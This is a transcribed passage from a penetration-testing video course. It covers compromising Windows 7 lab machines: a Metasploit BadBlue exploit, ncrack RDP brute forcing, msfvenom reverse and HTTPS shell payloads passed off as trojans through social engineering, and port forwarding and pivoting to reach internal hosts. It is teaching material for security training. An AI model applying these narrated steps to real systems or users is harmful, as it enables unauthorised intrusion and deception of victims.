Hello all, welcome to the Network Pentesting course on Pentester Academy. Now in this video, I will launch a new section which is Pentesting Windows environments and discuss the study plan. Now Windows and pentesting Windows environments, to be honest, is a really big topic if you want to cover it in a systematic, methodical and comprehensive manner. And that is exactly what we plan to do here. So if I may break up the entire Windows universe, you have endpoints such as laptops, workstations, and even mobile phones. You have servers such as web servers, Exchange servers, and whatnot, which run the Windows platform. And then, of course, your enterprise environments, which contain domain controllers, ADs, and all of that. Now, I would like to take up all of this in this section. However, I will break them up logically into endpoints, servers, and enterprise environments. So, before I move into any of the following, it's important to understand how systems get penetrated. Now, at a very high level, I could probably break it up into three broad categories. The first category is actually using software bugs and vulnerabilities. This is when somebody discovers a buffer overflow or some other vulnerability on either a core Windows service or a third-party program running on the Windows platform and figures out how he can use that vulnerability to get access to the box. So software vulnerabilities are plentiful, however, they typically get patched very fast if the platform is popular, which of course in this case Windows definitely ensures that it gets patched very fast. The second category with which penetrating systems happen is software misconfiguration. So this is when you have a weak password or you've misconfigured something in the configuration file in such a way that an attacker can figure out a loophole and compromise the system. This probably is one of the more common ones out there as systems are getting more and more complicated. Last but probably very important is the human component and aspect, which is using social engineering to go ahead and compromise systems and networks. Under social engineering, you have your own customized executables. You could probably go ahead and send links where you have Java applets loading, which give you backdoor access and whatnot. So we will take up examples from each of these three broad categories when we discuss pen testing Windows environments. Now, one of the most important aspects of this discussion is the lab setup. Now, Windows licensing typically makes it difficult for us to give you VMs with everything in it, right? In most cases, if not all, it would be completely illegal for us to do so. Now, having said that, setting up your own lab really has more advantages than disadvantages. First of all, you learn to go ahead and recreate the different vulnerabilities we will discuss. And of course, as a corollary, you should also learn how to fix them. Now, do not worry. In every example, if we take up either a software vulnerability or a misconfig or social engineering, I would run you through how to create the lab setup yourself in this lesson plan. Now, managing to get Windows operating systems like Windows 7, Windows 8, etc., that is something you would have to manage. And unfortunately, we cannot help you there. But given the proliferation of Windows, it shouldn't be too difficult for you to get your hands on one of those operating systems which we will use in this course. So I guess that's all I have for this video, and see you in the next one where we will formally kick off the technicality of the course. Thank you. Hello all, welcome to the Network Pentesting course at Pentester Academy. Now, as part of the study plan, we will first start with pen testing Windows endpoints. And in this section, we will look at software-based vulnerabilities. Now, it is important to note that the basics of vulnerabilities and how to use Metasploit and all of that is covered in depth in the Metasploit course at Pentester Academy, which you can find under topics. Now, I will be assuming that you have at least working knowledge of Metasploit for the rest of this series. If you don't, I would highly recommend checking out our Metasploit course and going through at least the first couple of videos. So what is the lab setup for this video? I'm going to be using the Metasploit framework, which you can install on Ubuntu or any other platform. I will be using Kali Linux because it comes pre-installed with Metasploit. As the victim, we'll have a Windows 7 endpoint, which is running the Bad Blue Enterprise Edition server. Now, the Bad Blue server is known to have a buffer overflow, which is detailed at exploit.db. Let's go there. Right, and you can click on the vulnerable app in here to go ahead and download it. And once you download it, you can install it on your Windows 7 system, which I leave as an exercise to you. So Bad Blue seems to be vulnerable to an SEH based exploit. You can clearly see SEH marked in here, along with, of course, stuff like PPR, which basically stands for pop ret. So once you've installed this on your Windows 7 environment, it should look like, probably once you've installed it, this is how the screen would look like. The IP address of my Windows 7 machine is 192.168.1.8, and my Kali machine is on the same network, right, and is running Metasploit. Ensure that Bad Blue is running on port 80, which if you install by default, that is the port it would pick up, and note the IP address. Right? Let's go back to the slides. Now, as I mentioned, when we penetrate or break into systems, there are multiple ways. Broad categorization was software bugs, then misconfig, and then social engineering. In this video, we are going to look at software bugs. Now, bugs or vulnerabilities can be, or rather, a bug is not a vulnerability. Please note that. A security vulnerability can actually be in core Windows services or in the OS itself. A good example of that would be the MS-08-67 vulnerability, which I've covered in the Metasploit course, so I'm leaving out here. The other possibility is in third-party software, right? These could be servers, these could be client-side software which get installed. Now, this is what we are going to look at in this video. And the third-party server is actually Bad Blue, which is installed on the Windows system for easy file sharing. Now, let me go back to our Kali machine, search and check if we have any exploits available for Bad Blue. The one we are interested is in the buffer overflow, which is documented in here for 272B pass-through. The one you've downloaded and installed has the right version, so nothing to worry there. And we see two vulnerabilities. The one we are interested in is the 2007 one. So let me go ahead, copy this out. Use show options, set our host 192.168.1.8. That was the IP address of the Windows 7 machine. Now the good news is this seems to be an universal exploit, which pretty much means more often than not it would be in one of the custom DLLs which ships with Bad Blue. And now we can just hit an exploit. If you haven't done Metasploit, please go to the Metasploit course first. And fantastic, right? We have a Metapreter session. Let's do a sysinfo. We see it's a Windows 7 machine. Let's just do a get UID. So we seem to be the security tube user under whom this process is now running. Let's do a get PID. We are 2780. If I do a quick PS, I would find a list of processes. Now it's typically a very good idea to migrate into a more stable process like explorer.exe, right? So let's just go ahead and do that. This is 2448. I'm going to hit migrate 2448. Right? And much of this is really covered in the Metasploit course. So as I said, I'm not going to go into the Metasploit basics of it, right? Fantastic. Now, this is how you can use a software vulnerability and break into a Windows system. Now, keep in mind, software vulnerabilities will keep coming and going. And unless the endpoints are really badly maintained, it is getting more and more rare that you would be able to penetrate into systems with such ease as I had shown you in this video. However, given the fact that in any given client environment you can see a mix of old legacy machines which might not be maintained well, it's always important to keep a note of the different softwares and the vulnerabilities found in them so that you could leverage that in some way. So that's all for this video. Hopefully you should be able to set up the lab with Bad Blue and try this yourself. And if you're enjoying your time at Pentester Academy, I would really appreciate and be thankful if you can recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all. Welcome to the Network Pentesting course at Pentester Academy. Now we will first take up Windows endpoints as we've discussed before. And in the previous video, we looked at software vulnerability based exploitation. In this video, we will look at how to break into a Windows system using software misconfigurations. Now, the service which we have picked up is a very common one. And if you've ever run a virtual server somewhere using Windows, then you would actually find that the RDP service or the remote desktop service is one of the most common services out there. Now, what misconfigurations are possible for RDP? The first one is really allowing RDP for all accounts, because doing this would probably put you at risk simply because even a single account with a weak username and password would allow for remote compromise. Second, having a weak username password alone may not cause too many issues if you had an account lockout policy set up so that once the attacker remotely tries, let's say 10 or 15 times, you automatically lock out that account to prevent further abuse. Unfortunately, on most systems, the account lockout policy is never applied. Finally, because RDP is such a well-known service on a well-known port, it would probably be a smart idea to run it on the non-default port, which is any port apart from 3389. Of course, this is not going to stop someone from running a scan and looking at what is there in the other ports and discover the RDP service, but it would at least make the attacker's life a little bit more difficult. Now, apart from this, there could be a ton of other things which you can do, like ensure that only specific IP addresses or subnets can connect to the RDP service, etc., to make a really strong, I would say, access control for the RDP service. Anyway, the service in question here is running on our Windows 7 machine, and basically RDP is enabled, and the way you can do it is from your control panel, go to System and Security, then System, click on remote settings and enable RDP, right? And I have a weak account on the system, and by default RDP gets enabled for all users. So the weak account has a username security tube and a weak password. So let me go into my Kali machine and let me run my nmap scan, in which I've specified the RDP port just to make things a little bit more faster for us. You can go ahead and scan the whole port range. And RDP is pretty much marked as ms-wbt-server when you run the scan on port 3389. So what this means is the RDP service is running and accessible, which means it's not filtered in any way. Now, to crack the RDP service remotely, our best friend is ncrack, which we have leveraged before as well for SSH and SNMP based brute forcing. Now I've created a simple list of users which includes security tube and a simple password list which includes the password which I have set for security tube user on my Windows 7 box. You can create your own lists, can be arbitrarily long depending on for how much time you would like to test this. After that, we use the -p option to select the RDP module followed by the IP address 192.168.1.8 in my case of the Windows 7 machine. So we can run ncrack and let me go ahead and pause the video while it is running. Didn't have to pause it for long. And if you notice, it basically said discovered credentials for RDP, security tube ABC123, right? And you can see once the discovery happened, if you go back to your Windows machine, you may actually find that it basically says, it's kind of locked out the screen and says security tube locked on, right? Interesting. So this is how you can use ncrack. There are a bunch of other tools as well with which you can try and crack RDP. Ncrack, in my experience, is one of the more stable ones, right? So I have the commands and everything in the slides as well so that you can look it up. And hopefully this video demonstrated how software misconfigurations can go ahead and contribute to your Windows endpoint being broken into. Hope you enjoyed this video, and if you're enjoying your time at Pentester Academy, we would really appreciate and be thankful if you can recommend us to your friends and colleagues in the InfoSec community. Thank you very much, guys. Until the next video. Bye-bye. Hello all. Welcome to the Network Pentesting course on Pentester Academy. Now in this video, we will look at using social engineering as an attack vector to compromise Windows endpoints. Now, as most of you already know, social engineering is really attacking the weakest link in the chain, right, which is the human being. Now, the techniques used for social engineering pretty much evolve as people get used to eventually figuring out that this is a way by which their security or their company's security gets compromised. So in the good old days, you used to have EXEs getting mailed in emails and stuff like that. But I think after that, most mail gateways now even reject emails containing binaries, and even people know that they probably should not go ahead and download a binary or maybe a zip file containing a binary in their email and execute it. So social engineers are getting more and more smarter, and there are a variety of techniques out there which are used. For example, creating websites which pretty much mimic the look and feel of legitimate sites, Java applets, HID devices, and whatnot. The best tool out there which you can use for social engineering is Dave Kennedy's SET, or the Social Engineering Toolkit. Now we will be covering SET in a very detailed way later on in this pen testing course. For now, it is sufficient that you know about it. If you already played with it, fantastic. Okay, so I am not going to take up a use case using set. Rather, I'm going to go ahead and build something entirely from scratch. So in the previous video, we've looked at payloads, and if you've seen the Metasploit course, you've probably already understood how payloads work, how they are generated. Now in this video, I'm going to convert the payload into an executable, and then basically using social engineering, have a user go ahead and run that executable and pretty much compromise the box using it. So let's get into it. Now, the tool which we will use is a companion script with Metasploit called MSF Venom. And if you run MSF Venom without any arguments, you would find that it lists how to use it. For us, it's very simple. MSF Venom. If you want to list all the payloads, you can just do a MSF Venom -L payloads. And this would list all the payloads which are there in the framework, which MSF Venom can also use. See, there are a ton of them. Now the one we are going to use for this specific demo is going to be the Meterpreter bind TCP. So let's scroll up, and here it is, right? Windows Meterpreter bind TCP. Now, if you have no clue about Metasploit and Meterpreter and all of that, please view the Metasploit course on Pentester Academy. We've covered all of this in great detail in that course already. Okay, so I'm going to go ahead and select the payload, which is going to be Windows Meterpreter bind _TCP. Use -O to check for any required options. Okay, looks like we can go with the default options. So I'm going to go ahead and mention the architecture x86, mention the output file format as exe, and then pretty much go ahead and pipe this to bind _shell.exe, or rather let me match the one I used for the slides so that when you look at the slides later on, it basically goes ahead and looks the same. So bind _payload.exe. I make it a point to try all demos and do the screenshot before I do the real one, just to know everything is good. And the screenshots can serve as a good cheat sheet as well, so that you guys don't have to go through the video again and again. Right, so here goes. This takes a bit. File bind _payload.exe tells us it's a P32. Fantastic. Now let's go back to the slides. Now what we want is, let's say in this simple social engineering example, I'm hosting this file as an exe with probably the name of a common binary people download and execute, or I can put it as part of a package manager, etc. So you can be very creative the way this exe eventually gets hosted online, and then maybe you can pass on the link through Facebook, Twitter, email, and say, hey, this is a great utility, and let's assume that the gullible user falls for it and he downloads it, right? So in this example, I'm going to set up a simple web server to go ahead and do it. I'm going to create a directory called Trojan, copy bind underscore payload into Trojan, change directory Trojan, and then using Python with a single line, I'm going to be starting off an HTTP server. Fantastic. Now my machine, my Kali machine's IP address is 1.13. So now I'm going to go into my Windows 7 environment. And please note that for this example, we've turned off the Windows firewall. Now do not worry, we will take examples with the firewall turned on. And I've also disabled the AV for this example so that we can slowly, gradually build on complexity. So again, don't worry, there will be demos with AVs running fully updated, and we will do AV evasion and all of that as well in just the next couple of videos. So, right now, don't cry foul. This is the easiest example we can take simply because this is really how we would gradually go through the learning curve. Okay. So I have the Windows firewall turned off. I have the AV disabled, and I have my Internet Explorer up and running. So let me go ahead, type in the IP address 1.13. It's on port 8000. We hit that. And basically, if I go back in here, I would go inside the directory Trojan. Looks like this is still caching it. There you go. It's caching it incorrectly. And I can see my bind underscore payload.exe in it. Let me go ahead and save this in my downloads folder. Close it. And now let's say you have the gullible user go ahead and run this, right? And it's running. Hopefully it's already bound to the port as it's a bind shell. The port number default, which kind of comes if you choose all the default options, is 4444. And you can clearly see that we fetched bind underscore payload. Now let's go to Metasploit and set up the handler. So use exploit multi-handler, set payload to be Windows meterpreter bind TCP, set rhost to be the Windows 7 machine IP address, which in my case is 1.5, and then you can run exploit so that we connect to port 4444 and claim our bind shell, right? In the case of a bind shell, this is really an application listening remotely and waiting for connections. We could easily verify that by running a command prompt and running netstat, right? And probably run netstat, and you can clearly see that in port 4444 there is a connection established from 1.13. If you look at the list of processes running, you would actually find that bind underscore payload.exe is running in there, right? In the background as expected, and we have a meterpreter shell which we can now pretty much use. Fantastic. Go back to our slides. Now this is how we can go ahead and exploit a remote system using social engineering. Now, of course, there are two parts here. One is, we have the firewall disabled, and that is why we could do the incoming connection onto the victim system and connect to it. And of course, we had the AV disabled. So let me go in here and just do a quick check to basically see what the AV thinks about this. So let me click on scan with AVG, which is disabled. However, I could just run the scan. and you can clearly see it says one threat detected, right? So it goes ahead and detects it as one virus being found, which is win32/here, right? So even though we've understood the whole use case of creating a bind shell, social engineering, and all of that, the social engineering aspect is really one part, and creating a binary which can go ahead and manage the firewall, manage the AV, manage maybe even host-based IDSs is a totally different aspect, right? So we'll take how to go ahead and work against this in the next couple of videos. Now, as far as AV evasion is concerned, it's a cat and mouse game, honestly, guys. The techniques are constantly evolving. It's always a mixture of some form of encoding, crypting, custom binaries, and there is really no silver bullet which will last forever. Because as people come up with new techniques, AV manufacturers look into it, they go ahead and patch it, then people again come up with new techniques. However, truth be told, AVs are much simpler to beat than most people think. Apart from an absolute signature match for a binary which the AV pretty much has been fed, most AVs end up failing with even the smallest variation being put into the binary. And that is something we will see when we take up AV evasion as a separate detailed topic in this network pen testing course. So the key learning here is using social engineering. If you have a user eventually execute your binary, then you get a shell on the box. That's all I have in mind for this video. If you're enjoying Pentester Academy, we would really appreciate if you can recommend us to your friends and colleagues in the InfoSec community. Have a great day ahead and see you in the next video. Welcome to the Network Pentesting course on Pentester Academy. Now in the previous video, we had seen how bind shells can be used when a firewall is actually disabled or pretty much allows anything on the system. Now we had talked about the scenario in which what if a firewall goes ahead and disallows outside in connections. So any connection originating from outside the network would be stopped by the network or the host-based firewall, right? In this case, even if you manage to get a malicious executable using social engineering or any other technique on the victim system, and even if you manage to execute it, it won't help because the attacker will not be able to connect back to the bind shell. So let me show you a demo. Now I've turned on the firewall. I'm going to my executable and I'm running it. Right, and if we go back to our machine, go back to Metasploit, and we go ahead and do the exact same thing which we did in the last video. Right, we basically use bind_TCP. We set our host to be 192.168.1.5. Hit exploit. Now you would notice, even though the binary executes on the remote system, which we can verify and see that it is all running in here, we can even go ahead and verify the IP address. Right, 1.5. You would notice that we are unable to connect to it, right? So in such cases, the bind shell is pretty much useless to us. And this is really where what we would require is the reverse connect. Now, if you had run bind_payload for the very first time, you would even get a screen which asks you whether you want to run it or not. But regardless, once the firewall is on, you've put it in max settings, even if it is running, nothing can connect to it. Now, what is a reverse connect payload? Now, as soon as using social engineering, we put the binary on the victim, it gets executed, the payload connects through the firewall back to the attacker. So really, this is inside out. And the beauty is most firewalls typically never block that, simply because they want the user on the machine to be able to access different services in the local network or on the internet without any hassle. So let's now go ahead and build an executable for reverse connect. Go back in here. I already have the settings put in just to save us some time. The only additional thing you would require in the reverse connect is basically the IP address. We can see that, let's say we try to run this, you would actually see that MSF Venom would fail, giving us the error. Of course, you could use -o, get the options and stuff like that as well, just purely to illustrate, right? So if you notice lhost is in there, let's just add it, lhost equals 192.168.1.13, which is the attacker's IP address. Takes a bit. Let's check the file. File seems okay. Let's go ahead and run our web server using Python. And let's jump back in here. So we could pretty much just kill bind_payload. There's no real reason to have it. Go back in here, refresh this page, see the reverse payload. Let's go ahead and save it. Right, let's go to the directory. And before the reverse payload, of course, connects back to us, we need to have the appropriate handler waiting for it. So here is what we are going to do. We'll set the payload to be reverse TCP. Show options to look at what we need to fill. Set lhost is 192.168.1.13. Then we go in, hit exploit, and now we are silently waiting for the payload to connect back to us once we execute it. So I'm going to go to reverse payload, run it. Right, visually nothing seems to happen in here, but if I go back, we see that the payload has connected back to us and we now are at a Meterpreter prompt. Now please note that the firewall is completely on and fully enabled, right? Because it is inside out, which is, a program from the victim machine connecting out, firewalls typically never go ahead and stop that. Now this is how you need to keep in mind that in today's scenarios, almost always you would probably end up using a reverse TCP, simply because it has a much higher chances of connecting back to you. There are other payloads which we will also discuss from the perspective of tunneling through networks and data exfiltration in the coming videos. So hope you enjoyed this one, and if you're overall liking your experience at Pentester Academy, I would really appreciate and be thankful if you can recommend us to your friends and colleagues in the InfoSec community. Thank you very much. See you in the next video. Bye-bye. Hello all. Welcome to the Network Pentesting course on Pentester Academy. Now in the previous videos, we looked at different payloads such as reverse TCP, etc. Now In this video, we will look at HTTP/HTTPS tunneling payloads. Now, where is the use case for this? Visualize a network in which only HTTP and HTTPS outgoing is allowed. And this is probably getting more and more common in enterprise networks, where I think pretty much most people just require access to the web to do their daily job. So apart from port 80 and 443, everything else inside out is blocked as well. Now let's go ahead and simulate that running Metasploit. In the meantime, I'm going to go to my Windows 7 machine. I'm to click on Advanced Settings under Windows Firewall. And in Outbound Rules, just as an example, I'm going to create a new rule. I'll say port, and let me specify 4444, which our reverse TCP connection uses. So block the connection, and let's call it block reverse TCP payload, and let's finish, and the rule should now be pretty much activated. Now let's go back in here, and we basically have our reverse payload. By the time hopefully our friend Metasploit is up, use exploit multi-handler, set payload, Windows, meter-preter, reverse TCP, set lhost 192.168.1.13, and let's hit exploit. Right? Now if I go back to my Windows 7 machine and I execute my reverse payload, what you would notice is that pretty much nothing happens, right? Which is expected simply because your reverse payload is now blocked by the outbound firewall rule set and pretty much cannot do anything. You can see it's already exited as well. And this is a problem you might increasingly face in more and more enterprises. So this is where our HTTP/HTTPS reverse connect payload comes in. Now the beauty of this payload is that it can go ahead and tunnel through either of these two protocols, and the best part is that it can even it does not require a permanent TCP connection to be made available to it. Now what do I mean by that? Now you know HTTP/HTTPS are stateless protocols, in which case we send a request for a page, we receive the page, and then we disconnect and we reconnect only when we require the next page. Now the best part of the Metasploit payload for HTTPS as an example is that it can go ahead and work across such TCP connections which are closed, and then again when reconnection happens, right? There are some advanced options as well regarding session communication timeout and expiration timeout. I would highly recommend you read the blog post which the Metasploit guys have written for more information. And let me now go ahead and demo the HTTPS reverse connect, right? HTTPS probably is more fun simply because I think it's going to get more and more prevalent, and it's probably going to be out there more often than one can imagine. Here's what I'm going to do. I'm going to open up a new tab. I'm going to use our good friend MSF Venom to first list all the payloads. And the payload which we are interested in is Windows Meterpreter reverse underscore HTTPS. So we go up. Here is Windows Meterpreter. And here is our Windows Meterpreter reverse underscore HTTPS. Let me copy this out. Let's look at the different options which come with this payload. Okay, as expected, the L host needs to be filled up. 168.1.13 x86 to be an exe, and let's call this reverse underscore https.exe. Right. The Metasploit blog post deals with the whole inspiration behind creating reverse underscore HTTPS and what all they've taken care of so that they can pretty much mimic the behavior of regular HTTPS connections. This is also good from an IDS evasion perspective. Fair enough, we have this. Let's go ahead and launch our good friend simple HTTP server. And let me jump onto my Windows box. Go in here, hit a refresh, and we find reverse underscore https.exe. Let's save it. Close. And now we have to go back in here. You can clearly see we had the web requests. And let's set the payload to reverse underscore HTTPS. Show options. Everything seems okay. Let's hit exploit and wait for it. Go back to our Windows box. Run it, and there you go, right? So now we have an HTTPS based reverse handler which was running, which now has opened up our Meterpreter session. So we can do our regular sysinfo and all the other things in post exploitation, right? Fantastic. So this is how we can actually use HTTPS reverse shell or reverse Meterpreter rather to go ahead and connect to us even if the firewall rule set is very restrictive, as we've discussed. You can try out the example with port 80 and go ahead and use Windows Meterpreter reverse underscore HTTP as the payload. And as I said, session communication timeout really deals with the number of seconds of inactivity before the session is actually closed, and session expiration timeout is really number of seconds after which you need to kind of go ahead and forcibly shut the session down. Now this, and as I mentioned before, the whole philosophy behind why HTTPS was actually created is mentioned in the blog post, which I would highly recommend that you guys read. That's all for this video. If you're enjoying your time at Pentester Academy, we would really appreciate and be thankful if you can recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all. Welcome to the Network Pentesting course at Pentester Academy. Now we're continuing with pentesting Windows endpoints, and in the previous video we had looked at a case in which HTTP and HTTPS outbound were open, everything else was closed. Now what if the enterprise network admin is really trying to be clever, and he's probably not running 80443, he's probably running services on totally different ports, which could be web or anything else. So what can we do if during a pen test we have no clue about what is the outbound open port composure of the network or host based firewall? Now, the only option would be a payload which can systematically go ahead and try each and every port beginning from 1 to 65,535 and try and connect back to the attacker. Now, the good news is that such a payload is available, and the name of the payload is Windows Meterpreter reverse underscore TCP underscore all ports. Right? So how do we simulate this? So what we are going to do is we are going to block a whole range of ports and then have our payload systematically try each and every one of them, and finally let's see if it can get to the attacker. Now, as you're probably already thinking, on the attacker side, given that we have no clue what is the outbound port allowed, how would we go ahead and be able to receive the payload's connection? Now, this is where we need to go ahead and do a little bit of IP tables magic and ensure that all ports within the given range where we expect the payload to connect back to us, we go ahead and actually redirect to our one single port on which our payload handler is listening. So let's run through each of these steps. Now the first set is actually to go ahead and create the firewall rule set. So let me create new rule. I'm going to say port, and I'm going to give a range 44442. Let's see what we have so we can match the slides. 6009. So this whole range of ports is something we are going to block entirely. Right? Let's say this is just called blocked range of ports. Right? So we've applied this. Now let's actually go ahead and create our payload. So let's look at all the options which we need to give our all ports payload. Okay, we need to give L host, fair enough. Let's actually put these in. L host is the host to connect back to. It's going to be 192.168.1.13, which is the attacker's machine. And L port, it says current setting is 1, the starting port number to connect back on. Now with this setting, it will start from 1 and try all the way to 65,535, right? Which of course is going to take a long time. I'm going to bring down the subset and tell it to start at L port equals 4444, right? Now if you remember, on our firewall, the range of ports blocked began from 4444 and ends in 6009, right? Keep this in mind. So now let me create the binary. There we go. And as the binary is being built, Let me go ahead and add the IP tables rule set. So what I've really done is first flushed all existing entries, and then I have gone ahead and created a rule which ensures that whenever any incoming connection comes for the port range 4444 to 6010, we go ahead and ensure that we send it to port 4444 bound on 192.168.1.13. Right? Now, as you can imagine, the firewall rule set was extending from 4444 to 6009, which means as soon as the payload tries 6010, it will be able to connect through the firewall and hopefully connect back to our payload. We'll see what happens. Let's check this. Fair enough, looks good. Let's start our Python server. Oops. And let's go back to Metasploit and set up our payload handler. In this case, L port needs to be set to 4444. Go back in here and hit exploit to have our handler wait. Now we go to our Windows machine, go to Internet Explorer, refresh again, we find reverse_all, save it, go back in here, reverse_all, let's run it, and we see that we have a connection back and we have a meterpreter session. Fantastic. Go back in here, we can even run command prompt, do a netstat -an, and you can clearly see this little entry in here which says 192.168.1.7 port 49630 is connected to 192.168.1.13 port 6010, right? This was the port on which we were expecting given our firewall rule set which we had created, right? If you remember, the firewall rule set was 4444 to 6009, which means our payload tried all combinations in between, and when it finally tried port 6010, it managed to go through the firewall and connect back to the attacker machine, simply because we were ensuring that port 6010 goes ahead and really the packet, when it kind of comes in, goes to port 4444 on our machine, right? And there you go. So you've seen how beautiful this specific payload is in going ahead and figuring out the firewall rule set and then going through that port to connect back to the attacker. Of course, on a live system, you can make the IP tables rules even more powerful if you have some clue about the IP address from where you expect the connection to come from and all of that. So try this example out. If you're curious about how this works, try out this link which explains pretty much how to forward all external ports to one local port. And of course, the link talks about all. I've just taken a small subset. So if you're enjoying your time at Pentester Academy, we would really appreciate if you can recommend us to your friends and colleagues in the InfoSec community. I'm hoping all of these videos have been, fun for you, similar to as, happy and, as much enjoyment as it gives me to make them. That's all for this video. Thank you. Hello all. Welcome to the Network Pentesting course at Pentester Academy. Now we will continue with pentesting Windows endpoints, and in this video we will look at an interesting thing called port forwarding. So what is really port forwarding? Now imagine that as a pen tester, you've compromised one of the machines on the network. Let's say it's the Windows 7 machine compromised using the bad blue exploit, which we had seen in a previous video. Now from with this machine, you'd probably like to inspect what is running on other machines on the network, and these machines might not be directly accessible to you from the internet. So here is the thing, right? From the Windows 7 machine, we would now want to go ahead and somehow forward the packets from the attacker to the machine he would like to inspect, and any responses from that machine back to the attacker. So in this video, we have the Windows 7 machine as the first victim, the attacker machine running Kali Linux, and Metasploitable 2 is really the machine connected to the Windows 7 1 over a separate network interface, but not accessible to the attacker directly. Now you can download Metasploitable 2 from the link provided here. So let's jump right in and see how we can use port forwarding to have the attacker inspect services on the Metasploitable 2 Linux machine, which is not directly accessible to him. So the first thing, of course, is to go ahead and compromise the Windows 7 machine. We can do a quick port scan. And it reveals that it is running bad blue. Search for bad blue. And this is what we've seen in a previous video. So if you haven't seen that, have a look at it so you get the link to download bad blue and all of that. Let's go ahead and use this exploit. Set our host 192.168.1.30, which is the Windows 7 machine. Let's exploit. So let's look at the list of processes so that we can migrate into Explorer, which is a more stable process. So let's migrate into Explorer. Now let's do an IP config to look at what interfaces are available. Now this is the loopback interface, which we aren't bothered about. The 192.168.1.30 interface is really what we broke into the Windows 7 machine. And you have another interface which seems to have an IP address 112.112.112.10, and this is a separate adapter. So if we look at our network diagram once again, this interface was the 192.168.1.30 through which the compromise happened, and there is another interface with an IP 112.112.112.10, which is in here. Now the first thing is we would like to scan this entire subnet and really check if any machines are up. So we can do that using the ARP scanner post exploitation script with the -r option. And let's go ahead and check all the machines in the subnet, see what we can find. The ARP scanner takes a bit to run. Okay, so we have 112.112.112.20, which seems to be up. Let's work with that. Now, if we assume that we would like to inspect port 80 of 112.112.112.20, then the way we would do this is using port forwarding. Now, what we want is that the attacker should be able to inspect, as an example, port 80 on this machine via the Windows 7 machine. So to do that, we are going to set port forwarding using the port forward command. Bunch of options, port forward add -L for local listener. Now the local listen port is really going to be the port on the attacker machine from where all traffic will be forwarded via the Windows 7 machine to this victim which we are trying to inspect. So let's say the local port is 8000. Now the remote port we'd like to inspect on 112.112.112.20 is port 80, and the remote IP address is 112.112.112.20 based on what we found in the ARP scan, and we've added the port forward. Now there are a bunch of things which one can do. So from the attacker machine, now we can go ahead, let's say, and do an nmap scan if we desired. Now the key difference would be that we would have to scan our own local port, whose traffic would now be forwarded to 112.112.112.20. So this should take a bit. And if you notice, it basically says that this port is actually running Apache HTTPD 228. Now in reality, this IP address is what is running Apache on port 80, right? And we intelligently did an nmap scan using the local listener 8000, which was created because of this port forward. Now we can even inspect what is running on the remote server. So here goes localhost 1000. And as you can see, we are met with the Metasploitable welcome page as soon as we navigate to port 80 of the victim machine. So this is how port forwarding can allow you to inspect services on machines deep within the network which might not be accessible to you directly from wherever you are pen testing the network. Now in the next video, we will look at something called pivoting, which in combination with port forwarding is a very deadly tool in your arsenal. So that's all I have in mind for this video. You can download Metasploitable 2 and go ahead and try this lab out. If you're enjoying your time here at Pentester Academy, then we would really appreciate if you could recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all, welcome to the Network Pentesting course at Pentester Academy. Now in this video, we will continue with pentesting Windows endpoints and look at pivoting. So really, what is pivoting? Now pivoting is the process by which an attacker uses a staging point, which is the first computer he compromises, and this can be within the network, in the DMZ, or any location which is accessible to him. And from this location, now he further breaks into the network. So as an example, in this case, the attacker compromises the Windows 7 machine, and using this machine as a pivot, he will compromise into the Metasploitable 2 machine. You can download Metasploitable from the link given here to prepare for the demo. And I'll pick up where we left off in the last video, where we had already compromised the Windows 7 machine using Bad Blue, and we've also figured out that a HTTP server is running. Now, if you click on any of these links, you would enter the web application. And what we will find is if you use a question mark -s, you find that the entire source code seems to be displayed, right? This is because of a vulnerability in PHP which we can exploit. Now, in order to do this, let's basically background the session and let's go ahead and search for PHP CGI arg vulnerability. There should be a module in Metasploit for this, and this is going to exploit the specific condition I just discussed to get us a meterpreter on the box. Now this is the vulnerability, and you notice this is 2012, not too old. Now the problem really arises is that the end machine we are trying to go ahead and compromise, if you remember, has an IP address 112.112.112.20, which of course is not directly accessible to the attacker. And this is where what the attacker is now going to do is create a route so that basically the Windows 7 machine acts as like a router which can go ahead and send the attacker's packets to the metasploitable machine, right? I'm just using the word router in a virtual sense. It isn't really routing the packets per se. Rather, all of this is happening in the meterpreter application logic running entirely from memory. So let's go ahead and look at the route command and see what options are required. So you basically have route add, and the subnet is 112.112, and basically we can say /255. Let's just supply the net mask separately. And the meterpreter session, fortunately I don't remember the meterpreter session number. Let's do a quick sessions -l is 1. So route add 112.112.112.1 255.255.255.0, and the meterpreter session through which we are going to route this is 1. There you go, the route has been added. Now inside this module, let's add our host to be 112.112.2.20, which is what we had discovered using the ARP scan in the previous video. Now we will be using a bind shell in this case, simply because, as you can imagine, if we create a payload with the attacker's IP address of 192.168.1.10, the victim machine 112.112.112.20 will not be able to figure out how to route the packets back to 192.168.1.10. So we're going to use a bind shell. So set payload PHP meterpreter So let's actually look at different payloads available. Oops, I did not change to the PHP arg vulnerability. My mistake. So use, there we go. And if we look at show options, let's go ahead and set our host back to this one and set payload to PHP meterpreter, and it's going to be bind TCP. And now we can hit exploit, and if you notice, now we have a new meterpreter session. So we can do a sysinfo, do a get UID, get PID, and you can clearly see right now we are basically on the Linux web server, which is a Metasploitable 2 machine. And if we background this and do a sessions-l, you would now notice we have 2 sessions available, where the second session has been pivoted via the first session. So this is how the process of pivoting works. Pivoting together with port forwarding is a really important concept from a pen testing perspective, and I would highly recommend that you try it out. Now, really, if you think about it, pivoting and port forwarding can happen progressively as the number of machines which you can chain together can pretty much grow to as large a number as you want. So really the Metasploitable 2 machine could have another interface, let's say, which is connected to a Windows 7 machine or a Windows 8 machine, which is vulnerable to something, which in turn could be connected to another Linux machine, and so on and so forth. I've pretty much at least used Metasploit to do pivoting and port forwarding, even across 5 to 6 such chains without any issues. So hopefully you've enjoyed this video, and if you like what you see here at Pentester Academy, then we would really appreciate if you can recommend us to your friends and colleagues in the InfoSec community. Thank you. All, welcome to the Network Pentesting course at Pentester Academy. Now we will continue with pentesting Windows endpoints, and in this video look at reverse connects through pivots. Now in the last video, if you recall, we compromised the Metasploitable Linux machine through the Windows 7 pivot, but we had created a bind shell because, as we said, if we had used a reverse connect with the attacker's IP, then the Metasploitable machine would never know how to route it back to the attacker, right? And depending upon the egress firewall rules, probably the Metasploitable machine can directly never reach the attacker. So how do we solve this problem? Simply because a bind shell is typically a bad idea and in most cases might not be possible. So ideally, here is what we would want. We would want the reverse connect from the Metasploitable 2 machine to actually be forwarded by the Windows 7 machine to the attacker, right? Now, traditionally, people have accomplished this with a lot of port forwarding magic, right? Using netcat and whatnot and fpipe and all of that. Now, the good news is that Metasploit now natively supports doing this. So all you have to do is in the reverse connect which you're setting while exploiting, set the L 